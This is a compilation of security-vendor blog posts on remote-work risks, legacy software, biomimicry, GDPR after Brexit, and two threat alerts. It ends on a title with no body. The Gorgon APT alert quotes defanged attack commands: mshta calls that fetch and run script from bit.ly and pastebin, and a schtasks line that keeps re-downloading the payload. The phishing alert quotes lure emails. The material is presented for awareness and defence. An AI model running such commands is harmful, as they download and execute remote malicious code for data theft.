What Are The Cybersecurity Issues With Remote Work

Remote work has become a highly popular and common practice around the world. According to the latest International Workplace Group report, 50% of employees globally are now working outside of their main office headquarters for at least 2.5 days per week. 80% of the same survey respondents indicated that out of two similar employment offers, they would decline the one that doesn’t offer the remote work possibility. What’s more, 75% of people consider flexible working to be the new normal. So it’s clear that remote work is here to stay.

However, while this practice increases flexibility, improves productivity and enhances work-life balance, there’s a downside to it. The problem here is that there are real cybersecurity issues with remote work that put your company’s sensitive data at risk.

Cybersecurity and Remote Work Statistics

In a recent study, OpenVPN reported that 90% of IT professionals believe remote workers are not secure. At the same time, over 70% think remote staff poses greater risk than onsite employees. So, the good news is that experts are actually acknowledging the security risks of remote work and this is the first step towards addressing the issue.

remote workers are not secure

Image source:

The Cybersecurity Issues with Remote Work

You may have a fully remote workforce, people who work from home from time to time, or employees who frequently go on business trips. And without a doubt, it’s more difficult to take care of their security than it is to manage your on-site endpoints.

Here are three bad habits related to remote work that your remote workers may be making that endanger your organization:

1. Accessing sensitive data through unsafe Wi-Fi networks

Your employees’ could be connecting to their home wireless network or accessing their corporate accounts using unsecured public Wi-Fi. This way, malicious actors nearby can easily spy on their connection and harvest confidential information. For instance, data sent in an unencrypted form in plain text might be intercepted and stolen by cybercriminals. For this reason, your employees should not be allowed to access any unknown Wi-Fi networks unless they are using a VPN connection.

2. Using personal devices for work

46% of employees admitted to transferring files between work and personal computers when working from home, which is a worrying practice.

At the same time, a trend of allowing employees to use their personal devices at work, commonly referred to as “Bring Your Own Device” or BYOD policy, has appeared.

You need to be fully aware of the issues involved by your employees using their personal devices for work-related matters. For instance, they may suddenly leave the company and hold on to the confidential information that has been stored on their device during their employment and you will not get the chance to erase it.

What’s more, they may not be keeping their software up-to-date, which opens up security holes in your environment. We keep stressing the importance of applying software patches in a timely manner and for a good reason.

Consequently, we would advise against letting your employees use their personal devices at work since it would be difficult for you to control what happens on their endpoints.

3. Ignoring basic physical security practices in public places

Even if cybersecurity is our focus, we can’t completely leave physical security behind when it comes to your company’s sensitive information. For example, there are employees who may be talking loudly on the phone while working in public places, expose their laptop’s screen for the entire crowd inside a café to see or even leave their devices unattended.

Teach your employees even the most basic security measures, even if they may seem like common sense at first glance. A friendly reminder for them not to expose the data of your business will always be of great benefit.

Creating a work-from-home security policy

So, how do you protect your company’s private data when you can’t fully control the devices used to access your network? Where should you start to make sure your remote workforce is secure?

The first step is to create a security policy specifically designed for remote workers. 93% of the IT professional interviewed in the OpenVPN study already have a formalized remote work policy in place and this quite impressive and reassuring.

Below are the essential security clauses that should be included in your remote work policy:

  • Clearly define which positions are eligible for remote work.

Be transparent towards your employees. Everyone should be aware which job functions are allowed to work remotely are which are not due to security reasons. Unfortunately, not every position is a good fit for remote work. If you don’t have a clear guide in place, chances are your work-from-home approvals will be judged as unfair.

  • List the tools and platforms they should be using.

Both your remote and on-site employees should be on the same page at all times and use the same approved tools, such as cloud storage platforms, communication/video conferencing tools, project management tools, etc.

  • Provide employees with steps to follow at the first signs of account compromise.

If they believe the company’s information has been compromised, they should have a clear guide to follow, such as where they should report the incident, be instructed to immediately change their passwords, etc. These steps should be included in their mandatory cybersecurity training, alongside other items such as how to create strong passwords.

What Solutions Your Remote Workforce Should Use For An Increased Security

Here are the fundamental tools that both your regular and remote employees should have installed on their devices:

1. Multi-factor authentication

This type of authentication will act as an additional layer of security on top of your remote employees’ accounts. The more security layers in place, the little the risk of a cyber-criminal to gain access to your sensitive systems.

2. Password Manager

Besides multi-factor authentication, in regards to passwords, your employees should also be using a password manager. This way, they will not need to remember all of the different passwords that they need to set up for their work-related accounts.

3. VPN

VPN connections are crucial when your employees connect to unsecured networks, such as Wi-Fi hotspots, even when they work from home. It’s recommended for your employees to be using your company’s VPN. What this tool does is it routes the traffic through the internet from your organization’s private network, ensuring even more security. Basically, anyone who tries to intercept the encrypted data will not be able to read it. And this way, your employees will be able to connect to your company’s intranet, the private network designed to be used only by your company’s staff (in case you have one).

4. Firewall

A firewall will prevent unauthorized access to and from the network, further strengthening the security of your employees’ devices. What firewalls do is they monitor network traffic, at the same time finding and blocking unwanted traffic. So, firewalls are important tools that will protect your remote endpoints against various cyber threats.

5. A strong EDR solution

Last but not least, your system administrators should be able to see the exact details of your endpoints at all times. This is why it’s recommended you deploy a complete endpoint detection and response (EDR) solution, that will allow you to remotely prevent next-gen malware, data leakage, respond quickly to threats, and automatically manage software deployment and patching.


It’s crucial for you to remain innovative and competitive in the current business landscape and allowing your employees to work remotely is definitely a necessary step. Yet, remote work comes with security risks that you should address before you allow anyone to work from outside the office – no matter if we’re talking about permanent remote workers or the ones who do it just a few hours per month. However, only when you will correctly respond to this challenge, will you be capable of fully seizing this opportunity that increases talent retention, productivity, and improves your staff’s work-life balance.

The post What Are The Cybersecurity Issues With Remote Work appeared first on Heimdal Security Blog.

What Is Legacy Software and a Legacy System in Business + The Risks

If you are leading a business or work within a business, this guide is definitely for you.

You have probably come across the term legacy software or legacy systems but don’t know exactly what they are. Or, even more likely, you are using legacy software or systems without even knowing it.

But there are risks and challenges associated with this (somewhat unavoidable) business practice.

Below I will explain everything there is to know about making the most you can out of legacy software and systems. As I said, it’s highly probable for a business older than a year to be using at least some tools which can be labeled as legacy tier.

First thing’s first, though: let’s start by exploring what is legacy software and what are legacy systems. Typically, any medium to large company nowadays has at least a few legacy elements in its IT environment.

Next, we’ll move along to tips that can help you identify whether your legacy software or legacy system is one of the risky ones or not.

What Is Legacy Software? Definition(s)

To put it in as few words as possible, legacy software is any piece of software that can’t receive continued patching or support from its developer, or can’t meet the compliance standards in use.

The examples of enterprise-level legacy software can be quite different.

Here are just a few cases which can be labeled as legacy software, to get a better idea of what it can encompass:

  • A major platform with no functional replacement (yet), still supported and compatible with other IT assets, but which does not receive security updates anymore;
  • An older piece of software that is still in use and receives support, but its creators are announcing the transition of support to the newer version of the product (such as the case of Python 2 vs Python 3);
  • A piece of software or platform which still gets updates but only for features (not security patches);
  • A piece of software or platform which still gets security updates and support but is no longer compliant with recent standards;
  • A piece of software or platform which gets updates and support but is not compatible with the newer systems and drivers in use (thus stalling the company’s adoption of those);

In some cases, the category of legacy software can include consumer-oriented software products issued by companies that no longer exist.

But, in spite of the discontinued support – and the discontinued official listing of that software (there’s nowhere to officially buy or download it from) – some users continue to procure it out of nostalgia.

Such is the case of Winamp media player, for example. There are entire Reddit forums dedicated to Winamp nostalgia, along with users still sharing custom made Winamp ‘skins’. There is also newly issued software that can emulate Winamp in-browser. So, the power of nostalgia for legacy software can still make the world go ‘round.

What Is a Legacy System in a Computer Industry Context?

A legacy system is a platform or hub or operating system (something which facilitates digital operations but is one level above software) which is outdated.

This state of being outdated can refer to the fact that the system is either lacking the possibility of support, or to its compatibility with other IT system elements, or to its level of compliance, or to the updates it receives.

Myth Busting Legacy Software and Legacy Systems

Here are the most common misconceptions about legacy software and legacy systems.

#1. Legacy software is useless


While legacy software and legacy systems still pose risks (which I’ll dive into below), it doesn’t mean they outlived their usefulness completely.

In many cases, a piece of legacy software or a legacy system is still in use precisely because it is the most comfortable option. Either there is no exact functional replacement yet, or the transition is still too difficult to weather.

Regardless of the exact reason, companies continue to use legacy software precisely because it’s still useful.

Ideally, yes, people should try to move on from legacy software as soon as it’s feasible, but things are always a bit more complicated in practice.

#2. Legacy software is free


The opposite can be true: precisely because legacy software was quite an investment, companies may be reluctant to replace it yet. An investment only makes sense if the cost is recovered over a pre-determined use period.

In many cases, even subscription-based software and systems (which the company is still actively paying for) are in fact legacy ones. The recurrent fee ensures continuous support and perhaps even some feature updates, but the security patches are unsatisfactory, or the software is not compliant.

#3. Legacy software is unsupported

Not always.

As mentioned above and through the examples so far, there are cases when legacy software is still supported by an actual team and you can still get an account manager to troubleshoot stuff for you.

Regardless, no matter how active and involved the support team behind the software is, if it doesn’t get security updates or is uncompliant, it still counts as legacy software.

#4. Legacy software is dangerous

Not always.

I know that most sources you will consult about legacy software will seem to push you to replace it ASAP, on account of it being dangerous.

But the truth is that legacy software is not always dangerous. It depends a great deal on the specifics of the case.

I’ll get into more detail on how to mitigate the risks of legacy software below.

#5. Legacy software and legacy systems should be immediately replaced


Just as legacy software is not always dangerous, so it does not always need to be replaced. It depends on the case and its specifics. Not only of the software but also of the company and its way of operating.

Before you decide whether a particular piece of legacy software needs to get replaced, you should do a case analysis. Applying software updates is a major hassle anyway for company IT admins unless they are already using a smart patching automatization software. No need to make that job even harder.

The Risks of Running Legacy Software and Systems in Your Business

Still, even if legacy software is not always dangerous, there are cases when it can definitely pose some risks.

Here are a few examples of such risks deriving from legacy software or legacy systems:

  • The risk of falling prey to a data breach or cyber-attack more easily;
  • The risk of slowing down the activity due to the performance issues or the need to manually fix issues regularly;
  • The risk of becoming non-compliant;

How to Mitigate the Risk of Legacy Software: 3 Ways

In order to avoid these three main types of risk deriving from legacy software or legacy systems, you just need to be proactive about it. Don’t wait until you are already facing a productivity crisis or, worse yet, a security breach.

The main ways to go about it are these:

#1. Consult with security experts about the legacy software elements in your IT environment

As mentioned above, it’s not always dangerous to stick to your legacy software or legacy system already in use. Sometimes the switch can involve costs that are not justified by the amount of risk you need to absorb. So, in some cases, it makes perfect sense to stick with the legacy software (and that’s exactly what some companies do).

Check with security experts to see what software absolutely poses a risk and what legacy software you can afford to continue using. Also, implement an automatic software patching solution in order to close potential security gaps and to make the life of your sys-admins easier.

#2. Do a case by case comparison between your legacy software and alternatives

Sometimes, the bad news is that legacy software that really needs to be replaced does not have a viable replacement yet.

But when it does, look into it just as you would look into any other business decision, with pros and cons. When you consider the (explicit) costs of updating, also consider the (implicit) costs of not updating. Is a potential breach easier to come back from than absorbing the costs of a change?

#3. Analyze the impediments to a transition from legacy software to non-legacy software

Also, in each case analysis, consider all the other variables and effort required for a transition. Compatibility and cost concerns are valid, but internal effort and time should not weigh so much in the final decision. Just because it will be a bit of a hassle doesn’t mean you should postpone indefinitely. That’s what gets companies on the breach list in most cases.

This concludes today’s guide on legacy software and legacy systems. If you have any questions or stories to share, feel free to comment below or contact me. I’m here to help if I can.

The post What Is Legacy Software and a Legacy System in Business + The Risks appeared first on Heimdal Security Blog.

Cybersecurity and Biology: Biomimicry and Innovation Inspired by Nature

Since digital systems have been built to well, mimic the way live systems function and behave (and malware also mimics the way a virus infection or disease behaves life), cybersecurity and biology have more in common than you’d think. Here’s how we can take a fresh look at this congruence by exploring the concept of biomimicry.

When it comes to ecosystems, our information technology ecosystem is very, very young (for example, the global internet is only about 30). Our planetary ecosystem, however, is well over 3 billion years old.

That’s 3-plus billion years of evolutionary innovation and natural intelligence that has inspired countless breakthroughs in the world of design — and that is now being tapped for game-changing new ideas in the high-stakes world of information security.

So, what can such creatures as the humble ant teach us about cybersecurity? Or for that matter, the chameleon or the Bornean moth?

Cybersecurity and Biology. The Idea of Biomimicry

Welcome to the fertile field of biomimicry which, according to Smithsonian Magazine (“How Biomimicry is Inspiring Human Innovation”), hinges on the notion that “we human beings, who have been trying to make things for only the blink of an evolutionary eye, have a lot to learn from the long processes of natural selection, whether it’s how to make a wing more aerodynamic or a city more resilient or an electronic display more vibrant.”

Or in the case of cybersecurity, to make information systems and defenses more secure, resilient, adaptable and secure.

The millions of species and organisms that have inhabited this planet far longer than humans have learned to adapt to life on earth uniquely, gracefully and sometimes with astonishing brilliance. As science author and biomimicry expert Janine Benyus put it, “they are our elders” so why not learn as much as we can from their “3.8 billion years of research and development.”

What is Biomimicry? [Several Definitions]

biomimicry and tech concept photo

While not a familiar term to all, humankind has used biomimicry from the time we started wearing animal skins for warmth.

“One of the most often-cited examples is Velcro, which the Swiss engineer Georges de Mestral patented in 1955 after studying how burs stuck to his clothes,” according to the Smithsonian report. In other examples, “a fan-created by Pax Scientific borrows from the patterns of swirling kelp, nautilus and whelks to move air more efficiently. A saltwater-irrigated greenhouse in the Qatari desert will use condensation and evaporation tricks gleaned from the nose of a camel.”

One of the best and simplest ways to think of biomimicry is “innovation inspired by nature.”

The term is believed to have been coined in 1982 and popularized by Janine Benyus in her 1997 book titled, you guessed it, “Biomimicry: Innovation Inspired by Nature.” Among the countless examples, she cites is the Wright brothers employing biomimicry by observing pigeons and vultures and using them as inspiration in the creation of the first airplane.

“Our most clever architectural struts and beams are already featured in lily pads and bamboo stems. Our central heating and air-conditioning are bested by the termite tower’s steady 86 degrees F. Our most stealthy radar is hard of hearing compared to the bat’s multifrequency transmission. And our new ‘smart materials’ can’t hold a candle to the dolphin’s skin or the butterfly’s proboscis. Even the wheel, which we always took to be a uniquely human creation, has been found in the tiny rotary motor that propels the flagellum of the world’s most ancient bacteria,” she writes.

“Unlike the Industrial Revolution, the Biomimicry Revolution introduces an era based not on what we can extract from nature, but on what we can learn from her.”

In addition to her books, Benyus has delivered multiple Ted Talks on the topic including: “Biomimicry’s Surprising Lessons From Nature’s Engineers” and “Biomimicry in Action.”

Here is how two of the leading organizations devoted to the study and advancement of biomimicry define the art and science of innovation inspired by nature.

“Biomimicry is an approach to innovation that seeks sustainable solutions to human challenges by emulating nature’s time-tested patterns and strategies.”

“Biomimicry is learning from and then emulating nature’s forms, processes, and ecosystems to create more sustainable designs.”

Biomimicry in Cyber Security: Digital Ants to the Rescue

digital lens over city night life

Creating analogies between cybersecurity and biology is not exactly new. Since the very advent of cybersecurity, experts have diagnosed the spread of malware in terms inspired by biology, such as ‘virus‘, ‘infection‘, ‘epidemic‘ and so on. But biomimicry is a more refined and accurate research field which may be just what cybersecurity approaches need right now for a greater focus. A fresh point of view is also always welcome, if only for avoiding a monoculture approach.

Some people who are also enthusiastically adopting this blended approach of combining cybersecurity and biology insights are dubbing this bio-cybersecurity. They support the idea that it’s an entirely new field, warranting its own research. While time will tell on whether a new science is born or not, it’s clear that cybersecurity and biology can have a lot to learn from each other.

OK, so what can the humble ant teach us about cybersecurity?

Well, ants are known to work collaboratively to accomplish such tasks as building, defending and repairing their nests. According to a Wall Street Journal article by JR Reagan, global chief information security officer for Deloitte (“The Nature Lover’s Guide to Cyber Security”), cybersecurity researchers are applying this type of “swarm intelligence.”

In one project which beautifully blends cybersecurity and biology, so-called “digital ants” monitor systems for anomalies such as malware. The ants drop “markers” where unusual activity occurs, similar to the pheromonal markers ants place along paths to food. When the markers at a given location exceed a certain threshold, an alarm is triggered to alert human cybersecurity specialists.

Bornean moths and chameleons also possess innate intelligence and capabilities applicable to information security, writes Reagan. The moths, for example, protect themselves from birds by creating leaf tents. Using a similar principle, “data masking” shields sensitive personal information from unauthorized viewers by replacing it with phony data.

The chameleon fools predators by changing colors to blend in with its surroundings, rendering itself nearly invisible. In cybersecurity, a practice called steganography disguises sensitive data to make it look like something else, say a picture of a flower or a music file.

Borrowing from the natural world to safeguard a virtual one” may seem paradoxical, writes Reagan. “But humans have engaged in biomimicry for eons. … Now, as then, we may find some of the best solutions to our problems on nature’s path.

Potential cybersecurity and biology combo strategies are also offered by the tale, or rather tail, of the lizard — a creature that easily sheds its tail when attacked in order to protect its more vital organs.

The Harvard Business Review, in an article titled “Defeat Hackers with Biomimicry,” explains how this concept can be adapted to cybersecurity. “There may be sacrificial systems or information you can offer up as a decoy for a cyber-predator, in which case an attack becomes an advantage, allowing your organization to see the nature of the attacker and giving you time to add further security in the critical part of your information infrastructure.

The belief that biomimicry is crucial to the future of cybersecurity is taken a step further in a piece penned by a biomimicry expert and a cyber CEO. In “Only Biomimicry Will Save Cybersecurity,” Idriss Aberkane and Stuart McClure write that biomimicry may even offer the promise of developing something resembling a virtual immune system.

Deep learning mimics nature: Looking at the Internet as an organism, we can attempt to copy the way organisms ensure their internal security“, they write. “Tomorrow’s security software will evolve as a predator-prey dynamic system, with each software population acquiring new characteristics until the entire system stabilizes its software diversity the same way an ecosystem stabilizes its biodiversity.

Finally, while not speaking specifically about biomimicry, another tech visionary also seemed to grasp the potential for applying the study of living organisms to the world of computers (thus successfully blending the best of cybersecurity and biology). Apple founder Steve Jobs, once said, “I think the biggest innovations of the 21st century will be at the intersection of biology and technology. A new era is beginning.

About the Author:

Michelle Moore, Ph.D., is an academic director and adjunct professor for the University of San Diego’s innovative, online Master of Science in Cyber Security Operations and Leadership program. She is also a researcher, author and cybersecurity policy analyst with over two decades of private-sector and government experience as a cybersecurity expert.

The post Cybersecurity and Biology: Biomimicry and Innovation Inspired by Nature appeared first on Heimdal Security Blog.

SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries

People in Nordic countries and beyond should beware: there’s a new credential stealing campaign up and running. For now, it seems to be hitting mostly these countries, but there’s no telling when it will extend to the rest of the world. Where there’s (illicit) money to be made, hackers are restless.

How the New Nordics Credential Stealing Campaign Works

As far as we’ve seen so far, the new Nordics credential-stealing campaign is targeting working emails. The malicious message pretends to be part of a previously agreed upon conversation, since the document is introduced as a link, without much explanation.

This is how a typical email looks like:

Fra: [sender email address] Sendt: 2. oktober 2019 09:56
Emne: Doc
Prioritet: Høj


Finn vedlagte dokument

Vis Dokument ({7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&

Med vennlig hilsen


Phone, Email, Company name etc.]

Translated into English, this email would be this:

From: [sender email address]
Posted: October 2, 2019 9:56 AM
Subject: Doc
Priority: High


Find the attached document

View Document ({7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&wd=tar 7C97f58f57-7285-4f70-8af0-fb5d7d3e3b82% 2FPDF% 20002% 7C4c8df191-241d-4d43-91b6-b3658f3bcdca% 2F% 29)

With best regards


Phone, Email, Company name etc.]

What happened next, if the user clicked that link?

They are redirected to a picture of a document (it’s not even a real document). The picture has a hyperlink inserted on it, which means that when a user clicks it, they will be redirected to a malicious page.

screenshot of fake document

The fraudulent page then asked users to login with whatever account they had, either Yahoo, Office 365, Gmail, etc.

You can watch a slideshow of what happened here (just move your mouse left-right to scroll through the screenshots).

A day later, the Nordics credential stealing campaign grew a new form. This time, the malicious document link was this one, instead:{b70a453e-0c44-45f5-8a31-01d022e88a43}&action=view&

In both cases, the malicious portal behind the fake links was

How to Stay Safe from the New Nordics Credential Stealing Campaign

If you have an active Thor Foresight or Thor Premium subscription you are automatically protected from the malicious links above.

But if you’re not – and even if you are – make sure you’re ready for the next round. This campaign or another one like it will be back.

The best way to deal with them is to stay on your guard:

  • Don’t open documents and don’t click any links in emails from people you don’t know;
  • Be proactive about your cybersecurity and have a DNS traffic filter (like Thor Foresight – either for Home or Enterprise);
  • Stay informed about credential stuffing (why criminals might want to steal your credentials) and about phishing in general;
  • If you are part of managing an organization (which means you and your employees will be huge targets for all sorts of phishing attempts), learn about business email compromise (BEC) and about MailSentry™, a cybersecurity solution specially designed to block BEC attacks of any kind.

Stay safe!

The post SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries appeared first on Heimdal Security Blog.

GDPR after Brexit: No Deal and All Other Exit Scenarios Explained

As the British MPs and the EU representatives continue to discuss the specifics of the upcoming Brexit, nothing is yet settled. In this murky context, companies in the UK and companies working with companies in UK are rightly confused.

What about GDPR, the transnational European data protection regulation to which we were just beginning to adjust?

Will there still be a GDPR after Brexit, for the UK space?

If it will change, how so?

Should a new kind of data protection compliance regulation be created for the UK instead of GDPR?

All these topics are intensely debated right now across all business mediums. Unfortunately, there’s a lot of uncertainty and a lot of Brexit and GDPR myths as well.

Let’s walk through everything together and see what will really happen with GDPR after Brexit on all possible scenarios.

Possible Brexit Scenarios

For now, British politicians are still stuck on debating whether they want to comply to the new law against a no deal situation.

There are several possible outcomes, depending on what will be decided on these counts:

  • If they choose to comply with the new law (accept the deal) or not;
  • If they ask for a delay in deciding (Brexit and the deal-or-no-deal debate simply get postponed);
  • If they try to negotiate a new deal;

Regardless of what happens next, the UK and companies connected to this space will still need to deal with GDPR. The GDPR after Brexit issue is not going anywhere.

Even in the most extreme outcomes, data compliance will still be on the agenda. Let’s take a few examples.

A. GDPR after Brexit with a deal

Within the deal currently on the table, GDPR is also stipulated as a must. If the British MPs somehow agree on the deal before the 31st of October deadline, then Brexit goes through as planned. GDPR would be part of the deal with the EU, so the current data compliance regulations stay in place.

In this case, you have nothing to change: GDPR rules stay in place as they are.

B. GDPR if Brexit is delayed and renegotiated

If the British MPs ask for a deadline extension to be able to hopefully gain consensus until then, GDPR essentially remains in place. Until the new deal is discussed and agreed upon, the UK does not technically leave the EU.

That means all European laws and UK-EU agreements stay the same as they were, including the GDPR, at least for the deadline extension.

The political party who initiated Brexit and continues to support it hard says delaying is not an option. But considering that the Parliament can’t seem to reach a consensus on how and when to exit the EU, or even on the idea of exiting at all, a delay is very possible.

C. GDPR after Brexit with no deal (Hard Brexit)

If, let’s say, the UK representatives refuse to comply and accept the deal, this will probably open up a whole can of worms of legal contention.

Until the issues are hashed and rehashed through courts, GDPR will become a big question mark.

One way or another, as the British minister in charge of data protection, Baroness Neville-Rolfe, has recently said, even if GDPR will no longer apply in the UK, some very similar legislation will need to be instated.

“One thing we can say with reasonable confidence is that if any country wishes to share data with EU member states, or for it to handle EU citizens’ data, they will need to be assessed as providing an adequate level of data protection,” Neville-Rolfe said. “This will be a major consideration in the UK’s negotiations going forward.”

While it’s not clear if the UK will still adhere to GDPR after Brexit, or adhere to a similar framework (such as the Privacy Shield, see below), or submit to being independently evaluated,

Useful Info for a GDPR after a No-Deal Brexit:

  • The documents and criteria for the EU’s adequacy decisions (how they decide a country provides adequate data protection and is therefore trustworthy);
  • The Privacy Shield Framework: a framework which allows people to transfer their personal data from the EU to the US while maintaining GDPR standards. There is the possibility for the UK to adhere to it or create a similar framework;
  • The Official GDPR FAQs – on the main GDPR portal.

There are 5 possible scenarios for a GDPR after Brexit with no deal, depending on your role in the data ecosystem.

We’ll tackle each one, but rest assured that the matter of data protection will not return to its pre-GDPR state. Once the world started taking data protection and privacy concerns seriously (and rightly so), there’s no turning back.

Here are the 5 possible scenarios for GDPR after Brexit with no deal:

In all data exchanges, we can speak of data controllers and data processors.

Data controllers are the business entities which collect the data of their clients and contacts (often in order to provide them with services) AND decide the purposes for which that data will be processed.

Data processors are the business entities which process the data on behalf of a data controller (besides any employees of the controller).

Data subjects are the people whose personal data is being processed.

We’ve drawn the 5 possible scenarios for a GDPR after Brexit, depending on the role of the business in the data flow.

  • Scenario 1: Controllers in the UK, providing services for UK people and entities and sharing no personal data with organizations outside the UK;
  • Scenario 2: Controllers in the UK, providing services for the UK but involved with processors in the EU (or anywhere else outside the UK);
  • Scenario 3: Controllers in the UK, providing services for people and business entities in the EU;
  • Scenario 4: Processors in the UK, acting on behalf of controllers or processors in the EU (or UK and EU);
  • Scenario 5: Processors in the UK, acting on behalf of controllers or processors in the UK.

#1. Scenario 1

This scenario is rather simple. Even though there are not a lot of cases like this in real life, since data circulation is never as tightly sealed as this, it has to be covered by any guide.

If you’re among the rare few UK controllers who only provide services to the UK and has no exchanges with non-UK processors, you’re lucky. You don’t really need to concern yourself with GDPR after Brexit.

The data protection laws you will need to abide by after Brexit are going to be more or less the same as the ones you are used to and will be communicated by UK authorities in due time.

It’s highly possible that after the UK leaves EU with no deal, the controllers doing business solely in the UK will need to comply with the Data Protection Act 2018 (DPA2018) instead of the GDPR. Or, another likely possibility is that GDPR will be absorbed into UK’s own laws upon Brexit (even with no deal).

In any case, the controllers defined by scenario 1 are the least affected by the GDPR after Brexit issue, because nothing will actually change for them.

#2. Scenario 2

Most small UK businesses fall into this category, of controllers in the UK who are involved with processors outside EU. Basically, anyone who uses international software like Microsoft, Facebook, Dropbox, and so on, can be fitted into this second scenario.

Legally, nothing really changes in this case either, because GDPR after Brexit will mean adopting the UK data protection law, DPA2018 (linked above). Since the processors outside the UK will still be compliant with GDPR, there is nothing that hinders these UK controllers from continuing to use their services.

#3. Scenario 3

In scenario 3, the UK controllers are not just working with non-UK processors but they are even serving EU-based clients or having EU offices and so on. In this case, the situation is a bit murkier.

The problem is that communicating between various branches and entities involved in the business process might be stalled by GDPR after Brexit.

To be proactive about it, you can designate a DPO (Data Protection Officer) in each country you have offices in, and that should cover the conditions imposed by the EU on third countries (which the UK will effectively become).

This will solve compliance issues, but be warned that handling GDPR after Brexit in paperwork terms might not be the worst of it. Because of the extra hassle involved, it’s very likely that obtaining more clients in the EU market will be difficult. It will be harder to compete with EU controllers who don’t have post-Brexit ambiguity to sort through.

#4. Scenario 4

After May 2018, all processors in the UK who were working with EU organizations were required to have them sign contracts which stipulated how their data would be handled. The issue here is that those contracts and agreements mentioned the UK as an EU country, which will no longer be true.

This means that all this paperwork will need to be redone. It’s best if you are proactive and start sending out the revised forms as soon as the Brexit decision is concluded one way or another.

There is the risk that some of your business partners will decline to resign, but you do the best with what you have and move on. Continuing to do business with them in the absence of flawless paperwork is too great of a risk to take.

#5. Scenario 5

For processors in the UK working only with data of people within the UK (and for controllers in the UK), the same applies as in Scenario 1. In other words, nothing changes, there is no extra concern to be had.

Cybersecurity Risks of GDPR after Brexit: A Few Words of Caution

As you can see by now, GDPR after Brexit will bring a lot of paperwork in many cases. Not just paperwork, but also a lot of communications going on with partners across national frontiers.

Since these communications will not be your standard run-of-the-mill, since the Brexit situation is new to everyone, this can be a huge opportunity for cybercriminals.

Be wary of any email you receive about Brexit and GDPR matters, especially if the sender is prompting you to do something involving vulnerable data. Don’t enter your login details on any page (could be a phishing attempt), don’t engage in conversations with people you don’t really know from before, etc.

Business Email Compromise (BEC) is a growing and costly threat. The little chaos which will likely flood everyone’s emails concerning GDPR after Brexit is the perfect opportunity for BEC attacks.

Spam filters are not enough to tackle it – you need to do some thorough background checks with every email and to also have an email security solution specially designed to counter BEC attacks.

Wrapping it up

I hope this guide helped clear the confusion surrounding GDPR after Brexit. In any case and however convoluted the Brexit process will continue to be, you should take some steps to prepare for the future.

Just look up your own business situation in the scenarios above and find out what can you expect even if we’ll have a no-deal Brexit. Good luck and drop us a line with any concern you might have.

The post GDPR after Brexit: No Deal and All Other Exit Scenarios Explained appeared first on Heimdal Security Blog.

SECURITY ALERT: Gorgon APT Targets Corporate Emails with Spear Phishing Campaign

The Gorgon APT (Advanced Persistent Threat) is an older but dangerous online threat, first discovered by Unit 42 researchers in February 2018.

The group behind the Gorgon APT was revealed back when the researchers were still investigating Subaat, an attacker, when they realized that they were probably part of a larger group targeting governmental organizations.

The History of Attacks by Gorgon APT

Ever since its initial discovery in February 2018, the Gorgon APT was orchestrating attacks both on government organizations (in the United States, United Kingdom, Russia, Spain, and others) and on corporate targets around the world.

The Gorgon group has often shared infrastructure when performing criminal and nation-state targeted attacks. This made the APT easier to track across these operations.

Within the Gorgon APT infrastructure, the researchers were able to identify several crimeware family samples, including Trojans, RATs like NjRat and info stealers such as LokiBot. These were all hosted on the command and control (C2) domain of the Gorgon group.

Interestingly, the Gorgon APT didn’t just use the traditional C2 strategies we could expect from it. It also used a variety of URL shortening services in order to download its payloads. This made its criminal activity more wide-spread and potentially more complex to track down, identify and eradicate.

The Current Spear Phishing Campaign by Gorgon APT

While the activities of the Gorgon APT flared on and off from February 2018 until now, the group is now back strongly with a new spear-phishing campaign.

So far, the targets we have intelligence about are located in Europe, but everyone else should be on guard too. It begins with an email containing this text (sanitized for your safety):


Re: Invoice_74521451


Dear Sir

My colleague handling this order is out of office for his vacation.

Please confirm the attached invoice as enabling us to proceed with the payment schedule.


Sri Astuti



As you can see, the bait here is the attached Excel document. Once the target clicks it, the malicious file will deliver the payload. The XLS file contains macro / VBA code which gets enabled once the document is opened.

Just like in its previous attacks, the Gorgon APT then connects to Pastebin and downloads and runs an obfuscated Javascript / VBA code from there.

This is done by spawning a shell with the following command:

mshta http://bit[.]ly/mydahsgkjshwodakiterikus


C:\Windows\System32\mshta.exe” http://www.pastebin[.]com/raw/0php6n7G

This leads to several layers of unescape obfuscation that redirects the traffic to a number of other Pastebin addresses (sanitized for your safety):




It creates a scheduled task that ensures that the payload is continuously downloaded (sanitized for your safety):

C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 300 /tn “DEFENDER Backup” /tr “mshta http:\\pastebin[.]com\raw\3qUvqbpZ”

A total of three script obfuscation methods are used: “StrReverse”, “split variables” and “multiple Wscript objects”.

The payload uses the function “LoadWithPartialName” via “reflection assembly” in the NET framework in order to download and process raw data in memory.

The final payload is a data stealer that communicates with multiple domains, all of which have already been blocked in Heimdal’s Thor Foresight engine.

The malicious XLS document is detected by 8 out of 57 Antivirus products listed by VirusTotal. This means that you can’t rely solely on your Antivirus to stay safe.

How to Stay Safe from the Gorgon APT and other Spear Phishing Campaigns:

#1. Don’t trust emails from people you don’t know

As much as possible, do not open attachments or click links from emails coming from unknown contacts. I know that in a professional environment this is virtually impossible but try to do your best.

You can read the emails, but don’t click links or open attachments until you establish more contact background. Reach out and ask the sender to remind you where you were acquainted or what deal they are bringing up.

Ideally, find a way to verify the sender legitimacy independent of further email threads. Pick up the phone and give them a call. Ask who introduced you if they are legit and how well do they know them.

#2. Don’t enter your credentials anywhere without extra checks

If you find yourself on a website or portal that looks like one you trust (Google, Facebook, Outlook, Salesforce, etc.) but which asks you to re-enter your credentials, don’t do it. No matter how much it looks like the real deal, it could be a spear-phishing attempt.

Make sure you check and double-check that the website address is correct, with no alterations. If you have any doubts, don’t enter your credentials. If it’s indeed necessary, you will be prompted to do it in the mail portal / app that you use, anyway.

#3. Have an email security solution firmly in place

Run your incoming emails through a solution which prevents BEC attacks, to make sure online crooks are not trying to fool you. Business Email Compromise (BEC) attacks are a growing threat and your email spam filter or firewall are not enough to halt it.

Final word

Last, but not least, stay vigilant. Learn how social engineering works, and how cybercriminals can get into your accounts. Keep learning more about cybersecurity so nothing can catch you by surprise.

If you’re interested, sign up for our Cybersecurity Course for Beginners. It’s completely free and you can learn everything at your own pace. Stay safe!

The post SECURITY ALERT: Gorgon APT Targets Corporate Emails with Spear Phishing Campaign appeared first on Heimdal Security Blog.

Enabling DNS over HTTPS (DoH): Advantages and Best Practices

